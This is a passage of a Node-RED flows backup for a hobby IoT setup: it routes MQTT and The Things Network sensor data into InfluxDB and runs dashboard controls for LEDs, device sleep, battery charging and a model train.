mqtt/node-red/data/.flows.json.backup
[
    {
        "id": "7c816d41.c6de64",
        "type": "tab",
        "label": "Netcup MQTT to Influx",
        "disabled": false,
        "info": ""
    },
    {
        "id": "ccfaccf6.841e2",
        "type": "tab",
        "label": " MQTT to Device",
        "disabled": false,
        "info": ""
    },
    {
        "id": "b39a305b.9e46b",
        "type": "tab",
        "label": "TTN MQTT --> Influx",
        "disabled": false,
        "info": ""
    },
    {
        "id": "c06e175005612f59",
        "type": "tab",
        "label": "TrainControll",
        "disabled": false,
        "info": ""
    },
    {
        "id": "ffef84d1.985898",
        "type": "mqtt-broker",
        "name": "Netcup Mqtt",
        "broker": "http://mqtt-broker",
        "port": "1883",
        "clientid": "",
        "usetls": false,
        "compatmode": false,
        "protocolVersion": "4",
        "keepalive": "60",
        "cleansession": true,
        "birthTopic": "",
        "birthQos": "0",
        "birthPayload": "",
        "birthMsg": {},
        "closeTopic": "TrainControll/onClose/",
        "closeQos": "0",
        "closePayload": "",
        "closeMsg": {},
        "willTopic": "TrainControll/lastWill/",
        "willQos": "2",
        "willPayload": "",
        "willMsg": {},
        "sessionExpiry": ""
    },
    {
        "id": "d90e8e47.15a97",
        "type": "mqtt-broker",
        "name": "TTN MQTT V3",
        "broker": "http://eu1.cloud.thethings.network",
        "port": "1883",
        "clientid": "",
        "usetls": false,
        "compatmode": false,
        "protocolVersion": "4",
        "keepalive": "60",
        "cleansession": true,
        "birthTopic": "",
        "birthQos": "0",
        "birthPayload": "",
        "birthMsg": {},
        "closeTopic": "",
        "closeQos": "0",
        "closePayload": "",
        "closeMsg": {},
        "willTopic": "",
        "willQos": "0",
        "willPayload": "",
        "willMsg": {},
        "sessionExpiry": ""
    },
    {
        "id": "d16c53d7.af87d8",
        "type": "influxdb",
        "hostname": "85.209.49.65",
        "port": "8086",
        "protocol": "http",
        "database": "ttn",
        "name": "InfluxDB",
        "usetls": false,
        "tls": "",
        "influxdbVersion": "1.x",
        "url": "influxdb",
        "rejectUnauthorized": false
    },
    {
        "id": "1d7f5ae1.d1794d",
        "type": "ui_base",
        "theme": {
            "name": "theme-light",
            "lightTheme": {
                "default": "#0094CE",
                "baseColor": "#0094CE",
                "baseFont": "-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif",
                "edited": true,
                "reset": false
            },
            "darkTheme": {
                "default": "#097479",
                "baseColor": "#097479",
                "baseFont": "-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif",
                "edited": false
            },
            "customTheme": {
                "name": "Untitled Theme 1",
                "default": "#4B7930",
                "baseColor": "#4B7930",
                "baseFont": "-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif"
            },
            "themeState": {
                "base-color": {
                    "default": "#0094CE",
                    "value": "#0094CE",
                    "edited": false
                },
                "page-titlebar-backgroundColor": {
                    "value": "#0094CE",
                    "edited": false
                },
                "page-backgroundColor": {
                    "value": "#fafafa",
                    "edited": false
                },
                "page-sidebar-backgroundColor": {
                    "value": "#ffffff",
                    "edited": false
                },
                "group-textColor": {
                    "value": "#1bbfff",
                    "edited": false
                },
                "group-borderColor": {
                    "value": "#ffffff",
                    "edited": false
                },
                "group-backgroundColor": {
                    "value": "#ffffff",
                    "edited": false
                },
                "widget-textColor": {
                    "value": "#111111",
                    "edited": false
                },
                "widget-backgroundColor": {
                    "value": "#0094ce",
                    "edited": false
                },
                "widget-borderColor": {
                    "value": "#ffffff",
                    "edited": false
                },
                "base-font": {
                    "value": "-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif"
                }
            },
            "angularTheme": {
                "primary": "indigo",
                "accents": "blue",
                "warn": "red",
                "background": "grey",
                "palette": "light"
            }
        },
        "site": {
            "name": "Node-RED Dashboard",
            "hideToolbar": "false",
            "allowSwipe": "false",
            "lockMenu": "false",
            "allowTempTheme": "true",
            "dateFormat": "DD/MM/YYYY",
            "sizes": {
                "sx": 48,
                "sy": 48,
                "gx": 6,
                "gy": 6,
                "cx": 6,
                "cy": 6,
                "px": 0,
                "py": 0
            }
        }
    },
    {
        "id": "79b9d42c.8d43b4",
        "type": "ui_tab",
        "name": "LED",
        "icon": "dashboard",
        "order": 1,
        "disabled": false,
        "hidden": false
    },
    {
        "id": "cde686a2.f098c8",
        "type": "ui_tab",
        "name": "Tab 2",
        "icon": "dashboard",
        "order": 2,
        "disabled": false,
        "hidden": false
    },
    {
        "id": "4766eaa3.60748c",
        "type": "ui_tab",
        "name": "Device",
        "icon": "dashboard",
        "disabled": false,
        "hidden": false
    },
    {
        "id": "7f0d4a96.3bbf9c",
        "type": "ui_group",
        "name": "Led",
        "tab": "79b9d42c.8d43b4",
        "order": 3,
        "disp": true,
        "width": "10",
        "collapse": false,
        "className": ""
    },
    {
        "id": "60b89e23.4e0e88",
        "type": "ui_group",
        "name": "Default",
        "tab": "79b9d42c.8d43b4",
        "order": 1,
        "disp": true,
        "width": "6",
        "collapse": false
    },
    {
        "id": "110b34ca.cee553",
        "type": "ui_group",
        "name": "ESP32-Settings",
        "tab": "79b9d42c.8d43b4",
        "order": 2,
        "disp": true,
        "width": "10",
        "collapse": false,
        "className": ""
    },
    {
        "id": "f5ba1b6d.bde328",
        "type": "ui_spacer",
        "name": "spacer",
        "group": "7f0d4a96.3bbf9c",
        "order": 1,
        "width": 1,
        "height": 1
    },
    {
        "id": "6b7e30d924b0fb9a",
        "type": "tasmota-mqtt-broker",
        "name": "85.209.49.65",
        "broker": "85.209.49.65",
        "port": "1883",
        "clientid": "",
        "usetls": false,
        "keepalive": "60",
        "cleansession": true
    },
    {
        "id": "e95824ce.80d4d",
        "type": "debug",
        "z": "7c816d41.c6de64",
        "name": "Netcup MQTT In",
        "active": true,
        "tosidebar": true,
        "console": true,
        "tostatus": true,
        "complete": "true",
        "targetType": "full",
        "statusVal": "payload",
        "statusType": "auto",
        "x": 590,
        "y": 360,
        "wires": []
    },
    {
        "id": "f986f0d6.569d5",
        "type": "mqtt in",
        "z": "7c816d41.c6de64",
        "name": "Slave --> Master",
        "topic": "mrflexi/device/+/miso",
        "qos": "2",
        "datatype": "auto",
        "broker": "ffef84d1.985898",
        "nl": false,
        "rap": false,
        "x": 100,
        "y": 360,
        "wires": [
            [
                "d376e1c.dd9d2a",
                "9c2fb543.955998"
            ]
        ]
    },
    {
        "id": "d376e1c.dd9d2a",
        "type": "json",
        "z": "7c816d41.c6de64",
        "name": "toJson",
        "property": "payload",
        "action": "",
        "pretty": false,
        "x": 350,
        "y": 360,
        "wires": [
            [
                "e95824ce.80d4d",
                "b8d4a25290c4574f",
                "c27712427dc30203",
                "605f714f7e0c3a9f"
            ]
        ]
    },
    {
        "id": "9c2fb543.955998",
        "type": "debug",
        "z": "7c816d41.c6de64",
        "name": "",
        "active": true,
        "tosidebar": true,
        "console": true,
        "tostatus": true,
        "complete": "true",
        "targetType": "full",
        "statusVal": "payload",
        "statusType": "auto",
        "x": 130,
        "y": 440,
        "wires": []
    },
    {
        "id": "fb631ff4.669",
        "type": "mqtt out",
        "z": "ccfaccf6.841e2",
        "name": "",
        "topic": "",
        "qos": "",
        "retain": "",
        "respTopic": "",
        "contentType": "",
        "userProps": "",
        "correl": "",
        "expiry": "",
        "broker": "ffef84d1.985898",
        "x": 610,
        "y": 260,
        "wires": []
    },
    {
        "id": "b660f813.ee2c8",
        "type": "inject",
        "z": "ccfaccf6.841e2",
        "name": "",
        "props": [],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "779b44ec.50addc"
            ]
        ]
    },
    {
        "id": "14c629ef.c98f2e",
        "type": "mqtt in",
        "z": "7c816d41.c6de64",
        "name": "",
        "topic": "#",
        "qos": "2",
        "datatype": "auto",
        "broker": "ffef84d1.985898",
        "nl": false,
        "rap": false,
        "x": 70,
        "y": 640,
        "wires": [
            [
                "a06960d3.a443c"
            ]
        ]
    },
    {
        "id": "a06960d3.a443c",
        "type": "debug",
        "z": "7c816d41.c6de64",
        "name": "mqtt_scanner",
        "active": true,
        "tosidebar": true,
        "console": true,
        "tostatus": true,
        "complete": "true",
        "targetType": "full",
        "statusVal": "payload",
        "statusType": "auto",
        "x": 220,
        "y": 600,
        "wires": []
    },
    {
        "id": "779b44ec.50addc",
        "type": "function",
        "z": "ccfaccf6.841e2",
        "name": "LED Rot",
        "func": "msg.payload = {\n                \"command\": {\n                    \"action\":\"LED_HeatColor\",\n                   \"value\":\"50\" }\n              }\nmsg.topic = \"mrflexi/device/esp-01/mosi\";\nreturn msg;",
        "outputs": 1,
        "noerr": 0,
        "initialize": "",
        "finalize": "",
        "libs": [],
        "x": 290,
        "y": 380,
        "wires": [
            [
                "fb631ff4.669",
                "85876817.bb7218"
            ]
        ]
    },
    {
        "id": "85876817.bb7218",
        "type": "debug",
        "z": "ccfaccf6.841e2",
        "name": "mqtt out",
        "active": true,
        "tosidebar": true,
        "console": false,
        "tostatus": false,
        "complete": "true",
        "targetType": "full",
        "statusVal": "",
        "statusType": "auto",
        "x": 620,
        "y": 340,
        "wires": []
    },
    {
        "id": "88bcf381.a83ba",
        "type": "function",
        "z": "ccfaccf6.841e2",
        "name": "LED Lila",
        "func": "msg.payload = {\n                \"command\": {\n                    \"action\":\"LED_HeatColor\",\n                   \"value\":\"225\" }\n              }\nmsg.topic = \"mrflexi/device/esp-01/mosi\";\nreturn msg;",
        "outputs": 1,
        "noerr": 0,
        "initialize": "",
        "finalize": "",
        "libs": [],
        "x": 290,
        "y": 300,
        "wires": [
            [
                "fb631ff4.669"
            ]
        ]
    },
    {
        "id": "5d3f5a9f.f7cd84",
        "type": "inject",
        "z": "ccfaccf6.841e2",
        "name": "",
        "props": [],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "88bcf381.a83ba"
            ]
        ]
    },
    {
        "id": "7c021081.6d4ca",
        "type": "inject",
        "z": "ccfaccf6.841e2",
        "name": "",
        "props": [],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payloadType": "str",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "c8f971b6.2d0448"
            ]
        ]
    },
    {
        "id": "c8f971b6.2d0448",
        "type": "function",
        "z": "ccfaccf6.841e2",
        "name": "LED off",
        "func": "msg.payload = {\n                \"command\": {\n                    \"action\":\"LED_off\",\n                   \"value\":\"50\" }\n              }\nmsg.topic = \"mrflexi/device/tbeam-01/mosi\";\nreturn msg;",
        "outputs": 1,
        "noerr": 0,
        "initialize": "",
        "finalize": "",
        "libs": [],
        "x": 290,
        "y": 240,
        "wires": [
            [
                "fb631ff4.669"
            ]
        ]
    },
    {
        "id": "2f9fc5db.7b300a",
        "type": "function",
        "z": "ccfaccf6.841e2",
        "name": "command without value",
        "func": "msg.payload = {\n                \"command\": {\n                    \"action\": msg.payload.toString(),\n                   \"value\": \"\" }\n              }\nmsg.topic = \"mrflexi/device/\"+flow.get('device_id')+\"/mosi\";\nreturn msg;",
        "outputs": 1,
        "noerr": 0,
        "initialize": "",
        "finalize": "",
        "libs": [],
        "x": 970,
        "y": 520,
        "wires": [
            [
                "315b55033ddffbbe",
                "c0a39ea54ba27078"
            ]
        ]
    },
    {
        "id": "a83dcf4d.b82ce8",
        "type": "function",
        "z": "ccfaccf6.841e2",
        "name": "set sleep time",
        "func": "old = msg;\nmsg.payload = {\n                \"command\": {\n                    \"action\":\"sleep_time\",\n                   \"value\": old.payload.toString() }\n              }\nmsg.topic = \"mrflexi/device/\" + flow.get(\"device_id\") + \"/mosi\";\nreturn msg;",
        "outputs": 1,
        "noerr": 0,
        "initialize": "",
        "finalize": "",
        "libs": [],
        "x": 320,
        "y": 580,
        "wires": [
            [
                "fb631ff4.669",
                "85876817.bb7218"
            ]
        ]
    },
    {
        "id": "5f9014d0.19f09c",
        "type": "inject",
        "z": "ccfaccf6.841e2",
        "name": "start",
        "props": [
            {
                "p": "payload"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": true,
        "onceDelay": 0.1,
        "topic": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "1c55aa99.afaf0d"
            ]
        ]
    },
    {
        "id": "1c55aa99.afaf0d",
        "type": "change",
        "z": "ccfaccf6.841e2",
        "name": "Initialize vars",
        "rules": [
            {
                "t": "set",
                "p": "device_id",
                "pt": "flow",
                "to": "tbeam-01",
                "tot": "str"
            },
            {
                "t": "set",
                "p": "payload",
                "pt": "msg",
                "to": "tbeam-01",
                "tot": "str"
            }
        ],
        "action": "",
        "property": "",
        "from": "",
        "to": "",
        "reg": false,
        "x": 270,
        "y": 40,
        "wires": [
            [
                "a78b6393.6444d8"
            ]
        ]
    },
    {
        "id": "df15b4ed.026d38",
        "type": "change",
        "z": "ccfaccf6.841e2",
        "name": "",
        "rules": [
            {
                "t": "set",
                "p": "device_id",
                "pt": "flow",
                "to": "payload",
                "tot": "msg"
            }
        ],
        "action": "",
        "property": "",
        "from": "",
        "to": "",
        "reg": false,
        "x": 720,
        "y": 40,
        "wires": [
            []
        ]
    },
    {
        "id": "6ee69646.9c8fa8",
        "type": "mqtt in",
        "z": "7c816d41.c6de64",
        "name": "IRQ",
        "topic": "mrflexi/device/+/miso/irq",
        "qos": "2",
        "datatype": "auto",
        "broker": "ffef84d1.985898",
        "x": 50,
        "y": 760,
        "wires": [
            [
                "e73a87ea.d20cd"
            ]
        ]
    },
    {
        "id": "aa43b92c.4d6bb8",
        "type": "debug",
        "z": "7c816d41.c6de64",
        "name": "irq",
        "active": false,
        "tosidebar": true,
        "console": true,
        "tostatus": true,
        "complete": "true",
        "targetType": "full",
        "statusVal": "payload",
        "statusType": "auto",
        "x": 670,
        "y": 780,
        "wires": []
    },
    {
        "id": "fe9a0c25.1387c",
        "type": "function",
        "z": "7c816d41.c6de64",
        "name": "devices",
        "func": "old = msg;\n\nmsg.payload = [{\n    irq_counter: \"1\",\n},\n{\n    device: old.payload.device,\n    source: \"mqtt\"\n}];\n\nmsg.measurement = \"device\";\nreturn msg;\n",
        "outputs": 1,
        "noerr": 0,
        "initialize": "",
        "finalize": "",
        "libs": [],
        "x": 500,
        "y": 760,
        "wires": [
            [
                "9a33317c.ba3d78",
                "aa43b92c.4d6bb8"
            ]
        ]
    },
    {
        "id": "e73a87ea.d20cd",
        "type": "json",
        "z": "7c816d41.c6de64",
        "name": "toJson",
        "property": "payload",
        "action": "",
        "pretty": false,
        "x": 270,
        "y": 760,
        "wires": [
            [
                "fe9a0c25.1387c"
            ]
        ]
    },
    {
        "id": "4cb03a30.815d1c",
        "type": "change",
        "z": "ccfaccf6.841e2",
        "name": "",
        "rules": [
            {
                "t": "set",
                "p": "set_bat_max_charge_current",
                "pt": "flow",
                "to": "payload",
                "tot": "msg"
            }
        ],
        "action": "",
        "property": "",
        "from": "",
        "to": "",
        "reg": false,
        "x": 800,
        "y": 100,
        "wires": [
            []
        ]
    },
    {
        "id": "21addaa3.2bbd26",
        "type": "function",
        "z": "ccfaccf6.841e2",
        "name": "command with value",
        "func": "msg.payload = {\n                \"command\": {\n                    \"action\":\"set_bat_max_charge_current\",\n                   \"value\": flow.get('set_bat_max_charge_current').toString() }\n              }\nmsg.topic = \"mrflexi/device/\"+flow.get('device_id')+\"/mosi\";\nreturn msg;",
        "outputs": 1,
        "noerr": 0,
        "initialize": "",
        "finalize": "",
        "libs": [],
        "x": 960,
        "y": 640,
        "wires": [
            [
                "315b55033ddffbbe",
                "c0a39ea54ba27078"
            ]
        ]
    },
    {
        "id": "b8244b54.937b28",
        "type": "mqtt in",
        "z": "b39a305b.9e46b",
        "name": "",
        "topic": "v3/mrflexi-ttnmapper@ttn/devices/#",
        "qos": "2",
        "datatype": "json",
        "broker": "d90e8e47.15a97",
        "nl": false,
        "rap": false,
        "x": 260,
        "y": 60,
        "wires": [
            [
                "1ee15bf6.9fbe7c",
                "fe8ac7a0.e96df8"
            ]
        ]
    },
    {
        "id": "1ee15bf6.9fbe7c",
        "type": "debug",
        "z": "b39a305b.9e46b",
        "name": "TTN MQTT in",
        "active": true,
        "tosidebar": true,
        "console": false,
        "tostatus": false,
        "complete": "true",
        "targetType": "full",
        "statusVal": "",
        "statusType": "auto",
        "x": 560,
        "y": 60,
        "wires": []
    },
    {
        "id": "d8b3dc68.7cee5",
        "type": "function",
        "z": "b39a305b.9e46b",
        "name": "convert_to_Influx",
        "func": "measurements = msg.payload.uplink_message.decoded_payload;\nvar container = [];\n\n// Build Influx Container with measurements and tags\ncontainer.push(measurements);\ncontainer.push({\n                    device: msg.payload.end_device_ids.device_id,\n                    source: \"ttn\"\n                });\n                    \nmsg.payload = container;\nmsg.measurement = \"value\";\nreturn msg;",
        "outputs": 1,
        "noerr": 0,
        "initialize": "",
        "finalize": "",
        "libs": [],
        "x": 430,
        "y": 440,
        "wires": [
            [
                "7590d85a.5095a",
                "c066d67eb0b2ee0d"
            ]
        ]
    },
    {
        "id": "8e422d2b.be1b08",
        "type": "function",
        "z": "b39a305b.9e46b",
        "name": "extract_ttn_payload",
        "func": "\nbase64 = msg.payload.uplink_message.frm_payload;\nsensor_type = msg.payload.uplink_message.decoded_payload.bytes[1];\n\nmsg.payload.ttn_data = base64;\nmsg.payload.ttn_sensor_type = sensor_type;\nreturn msg;",
        "outputs": 1,
        "noerr": 0,
        "initialize": "",
        "finalize": "",
        "libs": [],
        "x": 370,
        "y": 160,
        "wires": [
            [
                "ed614e38.4b1c38",
                "667d0070.d03798"
            ]
        ]
    },
    {
        "id": "667d0070.d03798",
        "type": "debug",
        "z": "b39a305b.9e46b",
        "name": "extract",
        "active": false,
        "tosidebar": true,
        "console": false,
        "tostatus": false,
        "complete": "true",
        "targetType": "full",
        "statusVal": "",
        "statusType": "auto",
        "x": 530,
        "y": 100,
        "wires": []
    },
    {
        "id": "7590d85a.5095a",
        "type": "debug",
        "z": "b39a305b.9e46b",
        "name": "TTN to InfluxDB",
        "active": true,
        "tosidebar": true,
        "console": true,
        "tostatus": false,
        "complete": "true",
        "targetType": "full",
        "statusVal": "",
        "statusType": "auto",
        "x": 750,
        "y": 440,
        "wires": []
    },
    {
        "id": "8d3ec4d9.d37ef",
        "type": "switch",
        "z": "b39a305b.9e46b",
        "name": "sensor_type",
        "property": "msg.payload.ttn_sensor_type",
        "propertyType": "msg",
        "rules": [
            {
                "t": "eq",
                "v": "201",
                "vt": "num"
            }
        ],
        "checkall": "true",
        "repair": false,
        "outputs": 1,
        "x": 410,
        "y": 240,
        "wires": [
            [
                "80a8c969.0c4018"
            ]
        ]
    },
    {
        "id": "fe8ac7a0.e96df8",
        "type": "switch",
        "z": "b39a305b.9e46b",
        "name": "TTN Port",
        "property": "payload.uplink_message.f_port",
        "propertyType": "msg",
        "rules": [
            {
                "t": "eq",
                "v": "3",
                "vt": "num"
            },
            {
                "t": "eq",
                "v": "2",
                "vt": "str"
            }
        ],
        "checkall": "true",
        "repair": false,
        "outputs": 2,
        "x": 160,
        "y": 160,
        "wires": [
            [
                "8e422d2b.be1b08"
            ],
            [
                "d8b3dc68.7cee5",
                "58720b92ae11106d"
            ]
        ]
    },
    {
        "id": "9a33317c.ba3d78",
        "type": "influxdb out",
        "z": "7c816d41.c6de64",
        "influxdb": "d16c53d7.af87d8",
        "name": "InfluxDB",
        "measurement": "",
        "precision": "",
        "retentionPolicy": "",
        "database": "ttn",
        "retentionPolicyV18Flux": "",
        "org": "JS",
        "bucket": "ttn",
        "x": 880,
        "y": 420,
        "wires": []
    },
    {
        "id": "a73e1188.fb143",
        "type": "ui_button",
        "z": "ccfaccf6.841e2",
        "name": "",
        "group": "110b34ca.cee553",
        "order": 5,
        "width": 0,
        "height": 0,
        "passthru": false,
        "label": "Start deep sleep",
        "tooltip": "",
        "color": "",
        "bgcolor": "",
        "className": "",
        "icon": "",
        "payload": "sleep",
        "payloadType": "str",
        "topic": "",
        "topicType": "str",
        "x": 720,
        "y": 520,
        "wires": [
            [
                "2f9fc5db.7b300a"
            ]
        ]
    },
    {
        "id": "fb3463cc.a8d888",
        "type": "ui_button",
        "z": "ccfaccf6.841e2",
        "name": "",
        "group": "110b34ca.cee553",
        "order": 4,
        "width": 0,
        "height": 0,
        "passthru": false,
        "label": "set current",
        "tooltip": "",
        "color": "",
        "bgcolor": "",
        "className": "",
        "icon": "",
        "payload": "",
        "payloadType": "str",
        "topic": "",
        "topicType": "str",
        "x": 710,
        "y": 640,
        "wires": [
            [
                "21addaa3.2bbd26"
            ]
        ]
    },
    {
        "id": "a78b6393.6444d8",
        "type": "ui_dropdown",
        "z": "ccfaccf6.841e2",
        "name": "",
        "label": "Device dropdown",
        "tooltip": "",
        "place": "Select option",
        "group": "110b34ca.cee553",
        "order": 1,
        "width": 0,
        "height": 0,
        "passthru": true,
        "multiple": false,
        "options": [
            {
                "label": "",
                "value": "mrflexi-01",
                "type": "str"
            },
            {
                "label": "",
                "value": "mrflexi-02",
                "type": "str"
            },
            {
                "label": "",
                "value": "esp-01",
                "type": "str"
            },
            {
                "label": "",
                "value": "soil_sensor-01",
                "type": "str"
            }
        ],
        "payload": "",
        "topic": "",
        "topicType": "str",
        "className": "",
        "x": 490,
        "y": 40,
        "wires": [
            [
                "df15b4ed.026d38"
            ]
        ]
    },
    {
        "id": "62905edb.139c6",
        "type": "ui_dropdown",
        "z": "ccfaccf6.841e2",
        "name": "",
        "label": "Max charge current",
        "tooltip": "",
        "place": "Select option",
        "group": "110b34ca.cee553",
        "order": 2,
        "width": 0,
        "height": 0,
        "passthru": true,
        "multiple": false,
        "options": [
            {
                "label": "100mA",
                "value": "0",
                "type": "str"
            },
            {
                "label": "190ma",
                "value": "1",
                "type": "str"
            },
            {
                "label": "450mA",
                "value": "4",
                "type": "str"
            },
            {
                "label": "550mA",
                "value": "5",
                "type": "str"
            },
            {
                "label": "700mA",
                "value": "7",
                "type": "str"
            },
            {
                "label": "960mA",
                "value": "10",
                "type": "str"
            },
            {
                "label": "1160ma",
                "value": "13",
                "type": "str"
            }
        ],
        "payload": "",
        "topic": "",
        "topicType": "str",
        "className": "",
        "x": 490,
        "y": 100,
        "wires": [
            [
                "4cb03a30.815d1c"
            ]
        ]
    },
    {
        "id": "80bea302.c80608",
        "type": "ui_slider",
        "z": "ccfaccf6.841e2",
        "name": "",
        "label": "Sleep time",
        "tooltip": "",
        "group": "110b34ca.cee553",
        "order": 3,
        "width": 0,
        "height": 0,
        "passthru": true,
        "outs": "end",
        "topic": "",
        "topicType": "str",
        "min": "1",
        "max": "60",
        "step": 1,
        "className": "",
        "x": 90,
        "y": 580,
        "wires": [
            [
                "a83dcf4d.b82ce8"
            ]
        ]
    },
    {
        "id": "80a8c969.0c4018",
        "type": "buffer-parser",
        "z": "b39a305b.9e46b",
        "name": "Battery Management PMU",
        "data": "payload.ttn_data",
        "dataType": "msg",
        "specification": "spec",
        "specificationType": "ui",
        "items": [
            {
                "type": "int16be",
                "name": "bus_voltage",
                "offset": 2,
                "length": 1,
                "offsetbit": 0,
                "scale": "0.01",
                "mask": ""
            },
            {
                "type": "int16be",
                "name": "bus_current",
                "offset": 4,
                "length": 1,
                "offsetbit": 0,
                "scale": "0.01",
                "mask": ""
            },
            {
                "type": "int16be",
                "name": "battery_voltage",
                "offset": 6,
                "length": 1,
                "offsetbit": 0,
                "scale": "0.01",
                "mask": ""
            },
            {
                "type": "int16be",
                "name": "battery_charge_current",
                "offset": 8,
                "length": 1,
                "offsetbit": 0,
                "scale": "0.01",
                "mask": ""
            },
            {
                "type": "int16be",
                "name": "battery_discharge_current",
                "offset": 10,
                "length": 1,
                "offsetbit": 0,
                "scale": "0.01",
                "mask": ""
            },
            {
                "type": "int16be",
                "name": "battery_bat_fuel_gauge",
                "offset": 12,
                "length": 1,
                "offsetbit": 0,
                "scale": "0.01",
                "mask": ""
            }
        ],
        "swap1": "",
        "swap2": "",
        "swap3": "",
        "swap1Type": "swap",
        "swap2Type": "swap",
        "swap3Type": "swap",
        "msgProperty": "payload.ttn_converted",
        "msgPropertyType": "str",
        "resultType": "keyvalue",
        "resultTypeType": "output",
        "multipleResult": false,
        "fanOutMultipleResult": false,
        "setTopic": true,
        "outputs": 1,
        "x": 640,
        "y": 240,
        "wires": [
            [
                "87474cf63fc0036d"
            ]
        ]
    },
    {
        "id": "ed614e38.4b1c38",
        "type": "base64",
        "z": "b39a305b.9e46b",
        "name": "",
        "action": "",
        "property": "payload.ttn_data",
        "x": 620,
        "y": 160,
        "wires": [
            [
                "8d3ec4d9.d37ef"
            ]
        ]
    },
    {
        "id": "c066d67eb0b2ee0d",
        "type": "influxdb out",
        "z": "b39a305b.9e46b",
        "influxdb": "d16c53d7.af87d8",
        "name": "InfluxDB",
        "measurement": "",
        "precision": "",
        "retentionPolicy": "",
        "database": "",
        "retentionPolicyV18Flux": "",
        "org": "JS",
        "bucket": "ttn",
        "x": 720,
        "y": 360,
        "wires": []
    },
    {
        "id": "510a7ac4c984038d",
        "type": "mqtt out",
        "z": "c06e175005612f59",
        "name": "",
        "topic": "TrainControll/toGleisbox/",
        "qos": "0",
        "retain": "",
        "respTopic": "",
        "contentType": "",
        "userProps": "",
        "correl": "",
        "expiry": "",
        "broker": "ffef84d1.985898",
        "x": 670,
        "y": 240,
        "wires": []
    },
    {
        "id": "41befcd4a5a26935",
        "type": "inject",
        "z": "c06e175005612f59",
        "name": "Speed 50",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "TrainControll/Lok",
        "payload": "{\"id\":\"5\",\"speed\":50,\"command\":\"Lok\",\"dir\":1}",
        "payloadType": "json",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "510a7ac4c984038d"
            ]
        ]
    },
    {
        "id": "c31081429b82914d",
        "type": "ui_slider",
        "z": "c06e175005612f59",
        "name": "",
        "label": "Speed",
        "tooltip": "",
        "group": "7f0d4a96.3bbf9c",
        "order": 5,
        "width": 0,
        "height": 0,
        "passthru": true,
        "outs": "all",
        "topic": "speed",
        "topicType": "msg",
        "min": 0,
        "max": "100",
        "step": "5",
        "className": "",
        "x": 410,
        "y": 560,
        "wires": [
            [
                "464d7c2570303806"
            ]
        ]
    },
    {
        "id": "a42a908d59d7eba6",
        "type": "ui_dropdown",
        "z": "c06e175005612f59",
        "name": "",
        "label": "",
        "tooltip": "",
        "place": "Select option",
        "group": "7f0d4a96.3bbf9c",
        "order": 6,
        "width": 0,
        "height": 0,
        "passthru": true,
        "multiple": false,
        "options": [
            {
                "label": "S Bahn",
                "value": "1",
                "type": "str"
            },
            {
                "label": "Portfeeder",
                "value": "2",
                "type": "str"
            }
        ],
        "payload": "",
        "topic": "",
        "topicType": "str",
        "className": "",
        "x": 220,
        "y": 660,
        "wires": [
            [
                "5693bc450cb61c37"
            ]
        ]
    },
    {
        "id": "464d7c2570303806",
        "type": "function",
        "z": "c06e175005612f59",
        "name": "build mqtt message",
        "func": "old = msg;\nmsg.payload = {\n                \"command\": \"Lok\",\n                \"dir\": 1,\n                \"speed\": old.payload,\n                \"id\": flow.get(\"id\")\n              }\nmsg.topic = \"TrainControll\"\nreturn msg;",
        "outputs": 1,
        "noerr": 0,
        "initialize": "",
        "finalize": "",
        "libs": [],
        "x": 610,
        "y": 560,
        "wires": [
            [
                "510a7ac4c984038d",
                "a12046999de60c53"
            ]
        ]
    },
    {
        "id": "a12046999de60c53",
        "type": "debug",
        "z": "c06e175005612f59",
        "name": "",
        "active": false,
        "tosidebar": true,
        "console": false,
        "tostatus": false,
        "complete": "payload",
        "targetType": "msg",
        "statusVal": "",
        "statusType": "auto",
        "x": 750,
        "y": 620,
        "wires": []
    },
    {
        "id": "5693bc450cb61c37",
        "type": "change",
        "z": "c06e175005612f59",
        "name": "",
        "rules": [
            {
                "t": "set",
                "p": "id",
                "pt": "flow",
                "to": "payload",
                "tot": "msg"
            }
        ],
        "action": "",
        "property": "",
        "from": "",
        "to": "",
        "reg": false,
        "x": 400,
        "y": 660,
        "wires": [
            []
        ]
    },
    {
        "id": "a14233ff2b90aab5",
        "type": "mqtt in",
        "z": "c06e175005612f59",
        "name": "",
        "topic": "#",
        "qos": "0",
        "datatype": "auto",
        "broker": "ffef84d1.985898",
        "nl": false,
        "rap": true,
        "rh": 0,
        "x": 170,
        "y": 460,
        "wires": [
            [
                "c132fd0dc89146af"
            ]
        ]
    },
    {
        "id": "c132fd0dc89146af",
        "type": "debug",
        "z": "c06e175005612f59",
        "name": "MQTT Listener",
        "active": true,
        "tosidebar": true,
        "console": false,
        "tostatus": false,
        "complete": "payload",
        "targetType": "msg",
        "statusVal": "",
        "statusType": "auto",
        "x": 380,
        "y": 460,
        "wires": []
    },
    {
        "id": "90f9aa23f97be725",
        "type": "mqtt in",
        "z": "c06e175005612f59",
        "name": "",
        "topic": "mrflexi/device/Lok",
        "qos": "2",
        "datatype": "auto",
        "broker": "ffef84d1.985898",
        "nl": false,
        "rap": true,
        "rh": 0,
        "x": 170,
        "y": 240,
        "wires": [
            [
                "510a7ac4c984038d"
            ]
        ]
    },
    {
        "id": "1c1111308021c88d",
        "type": "inject",
        "z": "c06e175005612f59",
        "name": "Speed 0",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
